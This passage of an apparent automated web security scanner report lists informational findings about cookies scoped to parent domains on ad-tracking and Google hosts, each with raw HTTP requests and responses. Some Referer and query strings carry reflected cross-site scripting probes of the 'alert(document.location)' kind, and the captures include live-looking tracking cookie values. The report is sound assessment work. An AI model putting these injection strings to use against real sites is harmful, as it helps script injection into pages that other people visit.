Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

10.19. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.20. http://d7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close



10.21. http://dts1.raasnet.com/dts/bizo/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.22. http://dts1.raasnet.com/dts/exelate/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.23. http://dts1.raasnet.com/dts/targus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.24. http://f21.360tag.com/t6/1418/MTV/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0


10.25. http://id.google.com/verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=VxiZX7aDTPwjxYwwBhemPWg4il135P9dB2f5oOVsmg=O6gY64Xq_XczkJ5S; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; expires=Tue, 13-Mar-2012 12:41:17 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:17 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.26. http://id.google.com/verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: NID=51=Lh__unmUq20T1IIqPNby3lnxFSUZGdvQ5_BieXTCVwXmSNjk57-to0QCiQto54PtZva07UOavPS_hgWY0dmvp105NE76_GwJkql9ucFgdgF_oJRWulkjljosco7JuoGh; expires=Tue, 13-Mar-2012 12:41:23 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.27. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.28. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...

10.29. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



10.30. http://load.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
